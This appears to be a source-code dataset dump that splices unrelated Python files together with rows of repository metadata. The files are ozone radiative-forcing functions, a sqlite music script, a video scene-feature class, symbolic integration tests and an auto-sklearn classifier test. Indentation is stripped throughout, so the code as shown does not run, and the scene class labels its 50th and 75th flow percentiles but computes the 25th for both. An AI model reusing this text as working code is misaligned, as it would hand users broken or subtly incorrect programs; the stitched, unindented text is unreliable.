tropospheric ozone ERF time series.
"""
# expand to 2D/1D if not already
if emissions.ndim == 1:
nspec = len(emissions)
emissions = emissions.reshape((1, nspec))
if np.isscalar(C_CH4):
C_CH4 = np.ones(1)*C_CH4
year, em_CO, em_NMVOC, em_NOx = emissions[:,[0, 6, 7, 8]].T
nt = len(year)
F_CH4, F_CO, F_NMVOC, F_NOx = np.zeros((4,nt))
for i in range(nt):
F_CH4[i] = beta[0] * (C_CH4[i]-PI[0])
F_CO[i] = beta[1] * (em_CO[i]-PI[1])
F_NMVOC[i] = beta[2] * (em_NMVOC[i]-PI[2])
F_NOx[i] = beta[3] * (em_NOx[i]-PI[3])
# Include the effect of climate feedback? We fit a curve to the 2000, 2030
# and 2100 best estimates of feedback based on middle-of-the-road
# temperature projections.
def temperature_feedback(T, a=0.03189267, b=1.34966941, c=-0.03214807):
if T<=0:
return 0
else:
return a*np.exp(-b*T)+c
if feedback:
F = F_CH4 + F_CO + F_NMVOC + F_NOx + temperature_feedback(T)
else:
F = F_CH4 + F_CO + F_NMVOC + F_NOx
return F
def stevenson(emissions, C_CH4, T=0, feedback=False, fix_pre1850_RCP=False,
PI=np.array([722, 170, 10, 4.29])):
"""Calculates tropospheric ozone forcing from precursor emissions based on
Stevenson et al, 2013 10.5194/acp-13-3063-2013
Inputs:
emissions: (nt x 40) numpy array
C_CH4 : (nt) numpy array of methane concentrations, ppb
Keywords:
T : change in surface temperature since pre-industrial
feedback : True or False - include temperature feedback on ozone
forcing?
fix_pre1850_RCP: Use different relationship for 1750/65 to 1850 based
on anthropogenic emissions from Skeie et al (2011)
for 1750 (atmos-chem-phys.net/11/11827/2011)
PI: : 4-element array of pre-industrial CH4 concentrations,
CO emissions, NMVOC emissions and NOx emissions
Outputs:
tropospheric ozone ERF time series.
"""
# expand to 2D/1D if not already
if emissions.ndim == 1:
nspec = len(emissions)
emissions = emissions.reshape((1, nspec))
if np.isscalar(C_CH4):
C_CH4 = np.ones(1)*C_CH4
# numbers in denominator are 2000-1750 concs or emissions used in
# Stevenson and traced back to Lamarque et al 2010 for 2000
# https://www.atmos-chem-phys.net/10/7017/2010/
year, em_CO, em_NMVOC, em_NOx = emissions[:,[0, 6, 7, 8]].T
nt = len(year)
F_CH4, F_CO, F_NMVOC, F_NOx = np.zeros((4,nt))
for i in range(nt):
if year[i]>=1850 or fix_pre1850_RCP==False:
F_CH4[i] = 0.166/960 * (C_CH4[i]-PI[0])
F_CO[i] = 0.058/681.8 * (em_CO[i]-PI[1])
F_NMVOC[i] = 0.035/155.84 * (em_NMVOC[i]-PI[2])
F_NOx[i] = 0.119/61.16 * (em_NOx[i] *
molwt.NO / molwt.N - PI[3])
# The RCP scenarios give a negative forcing prior to ~1780. This is
# because the anthropogenic emissions are given to be zero in RCPs but
# not zero in the Skeie numbers which are used here. This can be fixed
# to give a more linear behaviour.
else:
F_CH4[i] = 0.166/960 * (C_CH4[i]-722)
F_CO[i] = 0.058/681.8 * 215.59 * em_CO[i] / 385.59
F_NMVOC[i] = 0.035/155.84 * 51.97 * em_NMVOC[i] / 61.97
F_NOx[i] = 0.119/61.16 * 7.31 * (em_NOx[i]
* molwt.NO / molwt.N) / 11.6
# Include the effect of climate feedback? We fit a curve to the 2000, 2030
# and 2100 best estimates of feedback based on middle-of-the-road
# temperature projections.
def temperature_feedback(T, a=0.03189267, b=1.34966941, c=-0.03214807):
if T<=0:
return 0
else:
return a*np.exp(-b*T)+c
if feedback:
F = F_CH4 + F_CO + F_NMVOC + F_NOx + temperature_feedback(T)
else:
F = F_CH4 + F_CO + F_NMVOC + F_NOx
return F
| 36.384146 | 78 | 0.586224 | 911 | 5,967 | 3.731065 | 0.231614 | 0.015299 | 0.014122 | 0.014416 | 0.702265 | 0.702265 | 0.69138 | 0.644307 | 0.600177 | 0.558694 | 0 | 0.113499 | 0.306016 | 5,967 | 163 | 79 | 36.607362 | 0.707317 | 0.452321 | 0 | 0.56 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.04 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c67a7fccb58ad0744513e429cedf4044452005e
| 311 |
py
|
Python
|
databases/music.py
|
danielicapui/programa-o-avancada
|
d0e5b876b951ae04a46ffcda0dc0143e3f7114d9
|
[
"MIT"
] | null | null | null |
databases/music.py
|
danielicapui/programa-o-avancada
|
d0e5b876b951ae04a46ffcda0dc0143e3f7114d9
|
[
"MIT"
] | null | null | null |
databases/music.py
|
danielicapui/programa-o-avancada
|
d0e5b876b951ae04a46ffcda0dc0143e3f7114d9
|
[
"MIT"
] | null | null | null |
from utills import *
conn,cur=start('music')
criarTabela("tracks","title text,plays integer")
music=[('trunder',20),
('my way',15)]
insertInto("tracks","title,plays",music)
#cur.executemany("insert into tracks (title,plays) values (?,?)",music)
buscaTabela("tracks","title")
conn.commit()
conn.close()
| 25.916667 | 71 | 0.691318 | 40 | 311 | 5.375 | 0.65 | 0.204651 | 0.148837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014235 | 0.096463 | 311 | 11 | 72 | 28.272727 | 0.75089 | 0.22508 | 0 | 0 | 0 | 0 | 0.316667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c684d5c56bbbdacbeb8612a9b08130a83635f9a
| 13,250 |
py
|
Python
|
video_analysis/code/scene_postprocess.py
|
pdxcycling/carv.io
|
cce0f91a76d3ceed714b3625d415131fd9540899
|
[
"MIT"
] | null | null | null |
video_analysis/code/scene_postprocess.py
|
pdxcycling/carv.io
|
cce0f91a76d3ceed714b3625d415131fd9540899
|
[
"MIT"
] | null | null | null |
video_analysis/code/scene_postprocess.py
|
pdxcycling/carv.io
|
cce0f91a76d3ceed714b3625d415131fd9540899
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import re
from collections import Counter
from flow_preprocess import FlowPreprocess
class ScenePostprocess(object):
"""
Heavy-lifting macro-feature class
"""
def __init__(self, flow_df, quality_df, remove_transitions=False):
"""
Default constructor
Args:
flow_df: Optical flow dataframe
quality_df: Image quality dataframe
remove_transitions: whether to remove frames around
scene transitions
Returns:
Nothing
"""
self.flow_df = flow_df.copy()
self.quality_df = quality_df.copy()
self.remove_transitions = remove_transitions
self.is_static = None
self.duration = self.get_duration()
self.num_frames = quality_df.shape[0]
## Do some rudimentary cleaning of/addding to the flow data
self.flow_df['distance'] = FlowPreprocess.flow_distances(self.flow_df)
self.flow_df['angle'] = FlowPreprocess.flow_angles(self.flow_df)
## Add scene-centric timestamps
## TODO: This has a few issues with actual start times...
scene_time_offset = self.quality_df['time'].min()
self.flow_df['time_scene'] = self.flow_df['time'] - scene_time_offset
self.quality_df['time_scene'] = self.quality_df['time'] - scene_time_offset
self.min_time_scene = self.quality_df['time_scene'].min()
self.max_time_scene =self.quality_df['time_scene'].max()
self.min_frame_num = self.quality_df['frame_number'].min()
self.max_frame_num = self.quality_df['frame_number'].max()
def _find_columns_by_name(self, df, name_re):
"""
Helper function to find binned features by the prefixes in their names
Args:
df: Dataframe
name_re: regular expression for finding colmns
Returns:
List of columns that have names that match name_re
"""
output = []
cols = df.columns
for c in cols:
if re.search(name_re, c):
output.append(c)
return output
def get_duration(self):
"""
Find scene duration (in seconds)
Args:
None
Returns:
Duration of scene in seconds
"""
min_time = np.min(self.quality_df['time'])
max_time = np.max(self.quality_df['time'])
return max_time - min_time
def get_avg_blur(self):
"""
Find average blur across entire scene
NOTE: The higher the number, the less the blur.
Args:
None
Returns:
Average blur as single float value
"""
avg_blur = np.mean(self.quality_df['blur'])
return avg_blur
def get_blur_percentage(self, blur_threshold=100):
"""
Proportion of of frames in scene that are blurry.
A frame is "blurry" if its average blur is below blur_threshold
Args:
blur_threshold: A float value that defines the threshold between
blurry and non-blurry
Returns:
Flow value of the proportion of the scene's frames that are blurry
"""
blur_pct = 1. * np.sum(self.quality_df['blur'] < blur_threshold)/self.quality_df.shape[0]
return blur_pct
def get_top_colors(self, num_colors=10):
"""
Find the dominant colors in all frames across the scene
NOTE: This can be sped if only a subset of frames are sampled.
Need to run experiments on the optimal sampling rate.
TODO: This approach should be changed in v2.0
Args:
num_colors: The number of most common colors to return.
This is 10 by default.
Returns:
Numpy array containing the most prevalent colors in the scene
"""
self.num_colors = num_colors
max_color_array = np.array(str)
cols = self._find_columns_by_name(self.quality_df, "hue")
for frame_num in range(self.min_frame_num, self.max_frame_num + 1):
frame_color_array = self.quality_df[cols].ix[frame_num].sort_values()[::-1].index.values[:self.num_colors]
max_color_array = np.append(max_color_array, frame_color_array)
## Find most common colors
color_count = Counter(max_color_array)
return map(lambda x: x[0], color_count.most_common(self.num_colors))
def _get_values_from_bin_names(self, cols):
"""
From a list of columns representing bins, return a list of the values
of those bins
Args:
cols: a list of column names of histogram bins
Returns:
A list of the value of each bin
"""
values = []
for c in cols:
matches = re.search('_(\d+.\d+)', c)
if matches:
values.append(float(matches.groups(0)[0]))
else:
## This should never happen, but just in case...
values.append(None)
return values
def get_avg_saturation(self):
"""
Find the average saturation across all frames in the scene
Args:
None
Returns:
A float value of average scene saturation
"""
cols = self._find_columns_by_name(self.quality_df, "sat")
vals = self._get_values_from_bin_names(cols)
sums = self.quality_df[cols].sum()
avg = np.sum((sums * vals).values)/np.sum(sums)
return avg
def get_avg_value(self):
"""
Find the average value (from HSV colorspace) across
all frames in the scene
Args:
None
Returns:
A float value of average scene HSV value
"""
cols = self._find_columns_by_name(self.quality_df, "val")
vals = self._get_values_from_bin_names(cols)
sums = self.quality_df[cols].sum()
avg = np.sum((sums * vals).values)/np.sum(sums)
return avg
def get_pixel_pct(self, col_name, frame_size=(480., 360.)):
"""
Calculates the number of pixels in a scene are in col_name
Args:
col_name: the name of column of interest
frame_size:
Returns:
Proportion of pixels that are in the column of interest
"""
frame_pixels = frame_size[0] * frame_size[1]
num_frames = self.quality_df.shape[0]
total_pixels = frame_pixels * num_frames
pixel_cnt = np.sum(self.quality_df[col_name])
return pixel_cnt / total_pixels
"""
vvv Flow calculations vvv
"""
def get_flow_percentile(self, percentile=0.5):
"""
Find the distance traveled by optical flow point,
filtered by the specified percentile.
Args:
percentile: Flow distance percentile to return.
Percentile is between 0 and 1.
Returns:
A float value of the flow distance
"""
return self.flow_df['distance'].quantile(percentile)
def get_avg_flow(self):
"""
Find the average distance an optical flow point has traveled between
frames.
Args:
None
Returns:
A float value of the average distance an optical flow point
has traveled between frames
"""
return self.flow_df['distance'].mean()
def get_shake(self):
"""
Return the shakiness of the scene. Shake is calculated by finding the
median distance an optical flow point has traveled in each frame, and
averaging these values.
TODO: vector addition.
Args:
None.
Returns:
A float value representing the shakiness of a scene.
"""
if not self.flow_df.empty:
shake = np.mean((self.flow_df.groupby('frame_number').median())['distance'])
else:
shake = 0
return shake
def get_flow_angle(self):
"""
Find the average angle of travel of the optical flow points in a scene.
Args:
None
Returns:
A float value of the average optical flow angle
"""
return self.flow_df['angle'].mean()
def get_flow_angle_std_dev(self):
"""
Find the standard devation of all optical flows in a scene
Args:
None
Returns:
A float value of the standard deviation of optical flow angle
"""
return self.flow_df['angle'].std()
def is_static_scene(self, remove_transitions=False):
"""
Determines whether or not scene is a static scene (vs. action scene)
TODO: Ignore some time around scene transitions because of fades.
Ensure that scene is long enough.
Args:
remove_transitions: remove frames at beginning and end of scene
Returns:
A boolean value of whether a scene is static or not.
"""
is_static = None
motion_threshold = 1 # one pixel of movement
total_flow_points = self.flow_df.shape[0] ## number of frames in range
thresholded_df = self.flow_df[self.flow_df['distance'] > motion_threshold].copy()
if thresholded_df.empty:
is_static = True
else:
## Due to "artsy" transitions, ignore around beginning/end of scene
if remove_transitions:
## Amount of transition time between scenes
## This could be a percentage...
transition_time_buffer = 1 # in seconds
## Ensure that scene is long enough to remove buffer from analysis
if self.max_time_scene > transition_time_buffer:
thresholded_df = thresholded_df[thresholded_df['time_scene'] > transition_time_buffer]
thresholded_df = thresholded_df[thresholded_df['time_scene'] < self.max_time_scene - transition_time_buffer]
## Do not remove transitions if scene is too short
else:
pass
if not thresholded_df.empty:
##moving_flow_points = thresholded_df.shape[0]
moving_frames = thresholded_df.groupby(by=['frame_number']).mean().shape[0]
else:
##moving_flow_points = 0
moving_frames = 0
##pts_ratio = 1. * moving_flow_points/self.num_frames
pts_ratio = 1. * moving_frames/self.num_frames
# less than 1 moving frame per 4 frames
is_static = pts_ratio < .25
return is_static
def num_trackable_points_per_frame(self):
"""
Find the total number of optical flow points that are trackable per
frame.
"Trackability" is defined as being able to find a specific optical
flow point between frames.
Args:
None
Returns:
A dataframe with the number of trackable points, by frame.
"""
return self.flow_df.groupby('frame_number').size()
def avg_num_trackable_points_per_frame(self):
"""
Find the average number of optical flow points that are trackable,
over all frames in the frame.
"Trackability" is defined as being able to find a specific optical
flow point between frames.
Args:
None
Returns:
A float value of the average number of trackable optical flow
points in all of the scene's frames
"""
return 1. * len(self.flow_df) / self.num_frames
def to_df(self):
"""
Return a dataframe containing all features
TODO: better type checking
Args:
None
Returns:
Dataframe with all features
"""
scene_df = pd.DataFrame(index=[0])
top_colors = self.get_top_colors()
for n in range(self.num_colors):
scene_df['top_color_' + str(n)] = top_colors[n]
scene_df['avg_sat'] = self.get_avg_saturation()
scene_df['avg_val'] = self.get_avg_value()
scene_df['black_pixel_pct'] = self.get_pixel_pct('num_black_pixels')
scene_df['white_pixel_pct'] = self.get_pixel_pct('num_white_pixels')
scene_df['flow_percentile_25'] = self.get_flow_percentile(0.25)
scene_df['flow_percentile_50'] = self.get_flow_percentile(0.25)
scene_df['flow_percentile_75'] = self.get_flow_percentile(0.25)
scene_df['flow_avg'] = self.get_avg_flow()
scene_df['flow_angle'] = self.get_flow_angle()
scene_df['flow_angle_std_dev'] = self.get_flow_angle_std_dev()
scene_df['is_static_scene'] = self.is_static_scene()
##scene_df['action_peak_in_scene'] = None # where in scene does no
scene_df['shake_coeff'] = self.get_shake()
scene_df['avg_flow_pts_per_frame'] = self.avg_num_trackable_points_per_frame()
scene_df['blur'] = self.get_avg_blur()
scene_df['blur_pct'] = self.get_blur_percentage()
scene_df['duration'] = self.get_duration()
return scene_df
| 35.05291 | 128 | 0.60234 | 1,702 | 13,250 | 4.480024 | 0.174501 | 0.029508 | 0.035803 | 0.016787 | 0.309115 | 0.268459 | 0.229246 | 0.183475 | 0.153311 | 0.132852 | 0 | 0.006762 | 0.31917 | 13,250 | 377 | 129 | 35.145889 | 0.838488 | 0.367774 | 0 | 0.109489 | 0 | 0 | 0.066629 | 0.003146 | 0 | 0 | 0 | 0.013263 | 0 | 1 | 0.138686 | false | 0.007299 | 0.036496 | 0 | 0.313869 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c6cc14ec8ce3c7dc9875cccdf742d57d079973d
| 10,181 |
py
|
Python
|
diofant/tests/integrals/test_heurisch.py
|
Electric-tric/diofant
|
92c4bf0ef301e5d6f0cfab545b036e1cb7de3c0a
|
[
"BSD-3-Clause"
] | 1 |
2021-08-22T09:34:15.000Z
|
2021-08-22T09:34:15.000Z
|
diofant/tests/integrals/test_heurisch.py
|
Electric-tric/diofant
|
92c4bf0ef301e5d6f0cfab545b036e1cb7de3c0a
|
[
"BSD-3-Clause"
] | null | null | null |
diofant/tests/integrals/test_heurisch.py
|
Electric-tric/diofant
|
92c4bf0ef301e5d6f0cfab545b036e1cb7de3c0a
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from diofant import (Add, Derivative, Ei, Eq, Function, I, Integral, LambertW,
Piecewise, Rational, Sum, Symbol, acos, asin, asinh,
besselj, cos, cosh, diff, erf, exp, li, log, pi, ratsimp,
root, simplify, sin, sinh, sqrt, symbols, tan)
from diofant.integrals.heurisch import components, heurisch, heurisch_wrapper
__all__ = ()
x, y, z, nu = symbols('x,y,z,nu')
f = Function('f')
def test_components():
assert components(x*y, x) == {x}
assert components(1/(x + y), x) == {x}
assert components(sin(x), x) == {sin(x), x}
assert components(sin(x)*sqrt(log(x)), x) == \
{log(x), sin(x), sqrt(log(x)), x}
assert components(x*sin(exp(x)*y), x) == \
{sin(y*exp(x)), x, exp(x)}
assert components(x**Rational(17, 54)/sqrt(sin(x)), x) == \
{sin(x), root(x, 54), sqrt(sin(x)), x}
assert components(f(x), x) == \
{x, f(x)}
assert components(Derivative(f(x), x), x) == \
{x, f(x), Derivative(f(x), x)}
assert components(f(x)*diff(f(x), x), x) == \
{x, f(x), Derivative(f(x), x), Derivative(f(x), x)}
def test_heurisch_polynomials():
assert heurisch(1, x) == x
assert heurisch(x, x) == x**2/2
assert heurisch(x**17, x) == x**18/18
def test_heurisch_fractions():
assert heurisch(1/x, x) == log(x)
assert heurisch(1/(2 + x), x) == log(x + 2)
assert heurisch(1/(x + sin(y)), x) == log(x + sin(y))
# Up to a constant, where C = 5*pi*I/12, Mathematica gives identical
# result in the first case. The difference is because diofant changes
# signs of expressions without any care.
# XXX ^ ^ ^ is this still correct?
assert heurisch(5*x**5/(
2*x**6 - 5), x) in [5*log(2*x**6 - 5) / 12, 5*log(-2*x**6 + 5) / 12]
assert heurisch(5*x**5/(2*x**6 + 5), x) == 5*log(2*x**6 + 5) / 12
assert heurisch(1/x**2, x) == -1/x
assert heurisch(-1/x**5, x) == 1/(4*x**4)
def test_heurisch_log():
assert heurisch(log(x), x) == x*log(x) - x
assert heurisch(log(3*x), x) == -x + x*log(3) + x*log(x)
assert heurisch(log(x**2), x) in [x*log(x**2) - 2*x, 2*x*log(x) - 2*x]
def test_heurisch_exp():
assert heurisch(exp(x), x) == exp(x)
assert heurisch(exp(-x), x) == -exp(-x)
assert heurisch(exp(17*x), x) == exp(17*x) / 17
assert heurisch(x*exp(x), x) == x*exp(x) - exp(x)
assert heurisch(x*exp(x**2), x) == exp(x**2) / 2
assert heurisch(exp(-x**2), x) is None
assert heurisch(2**x, x) == 2**x/log(2)
assert heurisch(x*2**x, x) == x*2**x/log(2) - 2**x*log(2)**(-2)
assert heurisch(Integral(x**z*y, (y, 1, 2), (z, 2, 3)).function, x) == (x*x**z*y)/(z+1)
assert heurisch(Sum(x**z, (z, 1, 2)).function, z) == x**z/log(x)
def test_heurisch_trigonometric():
assert heurisch(sin(x), x) == -cos(x)
assert heurisch(pi*sin(x) + 1, x) == x - pi*cos(x)
assert heurisch(cos(x), x) == sin(x)
assert heurisch(tan(x), x) in [
log(1 + tan(x)**2)/2,
log(tan(x) + I) + I*x,
log(tan(x) - I) - I*x,
]
assert heurisch(sin(x)*sin(y), x) == -cos(x)*sin(y)
assert heurisch(sin(x)*sin(y), y) == -cos(y)*sin(x)
# gives sin(x) in answer when run via setup.py and cos(x) when run via py.test
assert heurisch(sin(x)*cos(x), x) in [sin(x)**2 / 2, -cos(x)**2 / 2]
assert heurisch(cos(x)/sin(x), x) == log(sin(x))
assert heurisch(x*sin(7*x), x) == sin(7*x) / 49 - x*cos(7*x) / 7
assert heurisch(1/pi/4 * x**2*cos(x), x) == 1/pi/4*(x**2*sin(x) -
2*sin(x) + 2*x*cos(x))
assert heurisch(acos(x/4) * asin(x/4), x) == 2*x - (sqrt(16 - x**2))*asin(x/4) \
+ (sqrt(16 - x**2))*acos(x/4) + x*asin(x/4)*acos(x/4)
def test_heurisch_hyperbolic():
assert heurisch(sinh(x), x) == cosh(x)
assert heurisch(cosh(x), x) == sinh(x)
assert heurisch(x*sinh(x), x) == x*cosh(x) - sinh(x)
assert heurisch(x*cosh(x), x) == x*sinh(x) - cosh(x)
assert heurisch(
x*asinh(x/2), x) == x**2*asinh(x/2)/2 + asinh(x/2) - x*sqrt(4 + x**2)/4
def test_heurisch_mixed():
assert heurisch(sin(x)*exp(x), x) == exp(x)*sin(x)/2 - exp(x)*cos(x)/2
def test_heurisch_radicals():
assert heurisch(1/sqrt(x), x) == 2*sqrt(x)
assert heurisch(1/sqrt(x)**3, x) == -2/sqrt(x)
assert heurisch(sqrt(x)**3, x) == 2*sqrt(x)**5/5
assert heurisch(sin(x)*sqrt(cos(x)), x) == -2*sqrt(cos(x))**3/3
y = Symbol('y')
assert heurisch(sin(y*sqrt(x)), x) == 2/y**2*sin(y*sqrt(x)) - \
2*sqrt(x)*cos(y*sqrt(x))/y
assert heurisch_wrapper(sin(y*sqrt(x)), x) == Piecewise(
(0, Eq(y, 0)),
(-2*sqrt(x)*cos(sqrt(x)*y)/y + 2*sin(sqrt(x)*y)/y**2, True))
y = Symbol('y', positive=True)
assert heurisch_wrapper(sin(y*sqrt(x)), x) == 2/y**2*sin(y*sqrt(x)) - \
2*sqrt(x)*cos(y*sqrt(x))/y
def test_heurisch_special():
assert heurisch(erf(x), x) == x*erf(x) + exp(-x**2)/sqrt(pi)
assert heurisch(exp(-x**2)*erf(x), x) == sqrt(pi)*erf(x)**2 / 4
def test_heurisch_symbolic_coeffs():
assert heurisch(1/(x + y), x) == log(x + y)
assert heurisch(1/(x + sqrt(2)), x) == log(x + sqrt(2))
assert simplify(diff(heurisch(log(x + y + z), y), y)) == log(x + y + z)
def test_heurisch_symbolic_coeffs_1130():
y = Symbol('y')
assert heurisch_wrapper(1/(x**2 + y), x) == Piecewise(
(-1/x, Eq(y, 0)),
(-I*log(x - I*sqrt(y))/(2*sqrt(y)) + I*log(x + I*sqrt(y))/(2*sqrt(y)), True))
y = Symbol('y', positive=True)
assert heurisch_wrapper(1/(x**2 + y), x) in [I/sqrt(y)*log(x + sqrt(-y))/2 -
I/sqrt(y)*log(x - sqrt(-y))/2, I*log(x + I*sqrt(y)) /
(2*sqrt(y)) - I*log(x - I*sqrt(y))/(2*sqrt(y))]
def test_heurisch_hacking():
assert (heurisch(sqrt(1 + 7*x**2), x, hints=[]) ==
x*sqrt(1 + 7*x**2)/2 + sqrt(7)*asinh(sqrt(7)*x)/14)
assert (heurisch(sqrt(1 - 7*x**2), x, hints=[]) ==
x*sqrt(1 - 7*x**2)/2 + sqrt(7)*asin(sqrt(7)*x)/14)
assert (heurisch(1/sqrt(1 + 7*x**2), x, hints=[]) ==
sqrt(7)*asinh(sqrt(7)*x)/7)
assert (heurisch(1/sqrt(1 - 7*x**2), x, hints=[]) ==
sqrt(7)*asin(sqrt(7)*x)/7)
assert (heurisch(exp(-7*x**2), x, hints=[]) == sqrt(7*pi)*erf(sqrt(7)*x)/14)
assert heurisch(1/sqrt(9 - 4*x**2), x, hints=[]) == asin(2*x/3)/2
assert heurisch(1/sqrt(9 + 4*x**2), x, hints=[]) == asinh(2*x/3)/2
assert heurisch(li(x), x, hints=[]) == x*li(x) - Ei(2*log(x))
def test_heurisch_function():
assert heurisch(f(x), x) is None
def test_heurisch_wrapper():
f = 1/(y + x)
assert heurisch_wrapper(f, x) == log(x + y)
f = 1/(y - x)
assert heurisch_wrapper(f, x) == -log(x - y)
f = 1/((y - x)*(y + x))
assert heurisch_wrapper(f, x) == \
Piecewise((1/x, Eq(y, 0)), (log(x + y)/2/y - log(x - y)/2/y, True))
# issue sympy/sympy#6926
f = sqrt(x**2/((y - x)*(y + x)))
assert heurisch_wrapper(f, x) == x*sqrt(x**2)*sqrt(1/(-x**2 + y**2)) \
- y**2*sqrt(x**2)*sqrt(1/(-x**2 + y**2))/x
def test_sympyissue_3609():
assert heurisch(1/(x * (1 + log(x)**2)), x) == I*log(log(x) + I)/2 - \
I*log(log(x) - I)/2
# These are examples from the Poor Man's Integrator
# http://www-sop.inria.fr/cafe/Manuel.Bronstein/pmint/examples/
def test_pmint_rat():
# TODO: heurisch() is off by a constant: -3/4. Possibly different permutation
# would give the optimal result?
def drop_const(expr, x):
if expr.is_Add:
return Add(*[ arg for arg in expr.args if arg.has(x) ])
else:
return expr
f = (x**7 - 24*x**4 - 4*x**2 + 8*x - 8)/(x**8 + 6*x**6 + 12*x**4 + 8*x**2)
g = (4 + 8*x**2 + 6*x + 3*x**3)/(x**5 + 4*x**3 + 4*x) + log(x)
assert drop_const(ratsimp(heurisch(f, x)), x) == g
def test_pmint_trig():
f = (x - tan(x)) / tan(x)**2 + tan(x)
g = -x**2/2 - x/tan(x) + log(tan(x)**2 + 1)/2
assert heurisch(f, x) == g
@pytest.mark.slow # 8 seconds on 3.4 GHz
def test_pmint_logexp():
f = (1 + x + x*exp(x))*(x + log(x) + exp(x) - 1)/(x + log(x) + exp(x))**2/x
g = log(x**2 + 2*x*exp(x) + 2*x*log(x) + exp(2*x) + 2*exp(x)*log(x) + log(x)**2)/2 + 1/(x + exp(x) + log(x))
# TODO: Optimal solution is g = 1/(x + log(x) + exp(x)) + log(x + log(x) + exp(x)),
# but Diofant requires a lot of guidance to properly simplify heurisch() output.
assert ratsimp(heurisch(f, x)) == g
@pytest.mark.slow # 8 seconds on 3.4 GHz
def test_pmint_erf():
f = exp(-x**2)*erf(x)/(erf(x)**3 - erf(x)**2 - erf(x) + 1)
g = sqrt(pi)*log(erf(x) - 1)/8 - sqrt(pi)*log(erf(x) + 1)/8 - sqrt(pi)/(4*erf(x) - 4)
assert ratsimp(heurisch(f, x)) == g
def test_pmint_LambertW():
f = LambertW(x)
g = x*LambertW(x) - x + x/LambertW(x)
assert heurisch(f, x) == g
@pytest.mark.xfail
def test_pmint_besselj():
# TODO: in both cases heurisch() gives None. Wrong besselj() derivative?
f = besselj(nu + 1, x)/besselj(nu, x)
g = nu*log(x) - log(besselj(nu, x))
assert simplify(heurisch(f, x) - g) == 0
f = (nu*besselj(nu, x) - x*besselj(nu + 1, x))/x
g = besselj(nu, x)
assert simplify(heurisch(f, x) - g) == 0
@pytest.mark.slow
def test_pmint_WrightOmega():
def omega(x):
return LambertW(exp(x))
f = (1 + omega(x) * (2 + cos(omega(x)) * (x + omega(x))))/(1 + omega(x))/(x + omega(x))
g = log(x + LambertW(exp(x))) + sin(LambertW(exp(x)))
assert heurisch(f, x) == g
def test_RR():
# Make sure the algorithm does the right thing if the ring is RR. See
# issue sympy/sympy#8685.
assert heurisch(sqrt(1 + 0.25*x**2), x, hints=[]) == \
0.5*x*sqrt(0.25*x**2 + 1) + 1.0*asinh(0.5*x)
# TODO: convert the rest of PMINT tests:
# Airy functions
# f = (x - AiryAi(x)*AiryAi(1, x)) / (x**2 - AiryAi(x)**2)
# g = Rational(1,2)*ln(x + AiryAi(x)) + Rational(1,2)*ln(x - AiryAi(x))
# f = x**2 * AiryAi(x)
# g = -AiryAi(x) + AiryAi(1, x)*x
# Whittaker functions
# f = WhittakerW(mu + 1, nu, x) / (WhittakerW(mu, nu, x) * x)
# g = x/2 - mu*ln(x) - ln(WhittakerW(mu, nu, x))
| 34.511864 | 112 | 0.534722 | 1,869 | 10,181 | 2.87801 | 0.107009 | 0.030117 | 0.072504 | 0.023796 | 0.466072 | 0.342443 | 0.232757 | 0.204313 | 0.189812 | 0.138873 | 0 | 0.047576 | 0.232001 | 10,181 | 294 | 113 | 34.629252 | 0.640363 | 0.122778 | 0 | 0.086957 | 0 | 0 | 0.00146 | 0 | 0 | 0 | 0 | 0.003401 | 0.467391 | 1 | 0.141304 | false | 0 | 0.016304 | 0.005435 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c70c6e774d6a8ca53417d3cc9999e257be28aad
| 1,093 |
py
|
Python
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 1 |
2021-02-21T16:44:44.000Z
|
2021-02-21T16:44:44.000Z
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 9 |
2021-02-12T17:52:34.000Z
|
2021-06-26T11:37:41.000Z
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 1 |
2021-07-06T23:02:42.000Z
|
2021-07-06T23:02:42.000Z
|
import sklearn.linear_model
from autosklearn.pipeline.components.classification.passive_aggressive import \
PassiveAggressive
from .test_base import BaseClassificationComponentTest
class PassiveAggressiveComponentTest(BaseClassificationComponentTest):
__test__ = True
res = dict()
res["default_iris"] = 0.92
res["iris_n_calls"] = 5
res["default_iris_iterative"] = 0.92
res["iris_iterative_n_iter"] = 32
res["default_iris_proba"] = 0.29271032477461295
res["default_iris_sparse"] = 0.4
res["default_digits"] = 0.9156041287188829
res["digits_n_calls"] = 6
